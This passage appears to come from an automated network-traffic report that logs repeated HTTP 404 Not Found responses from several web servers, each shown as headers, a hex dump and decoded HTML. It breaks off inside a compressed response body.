0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 00:25:39 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66e01838-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 00:25:42 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66e01838-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 00:25:45 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66e01838-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 00:25:48 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66e01838-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Wed, 27 Nov 2024 00:26:10 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Wed, 27 Nov 2024 00:26:13 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Wed, 27 Nov 2024 00:26:15 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Wed, 27 Nov 2024 00:26:18 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 00:27:02 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 00:27:05 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 00:27:10 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 00:28:04 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 00:28:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 00:28:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 00:28:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 00:28:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a 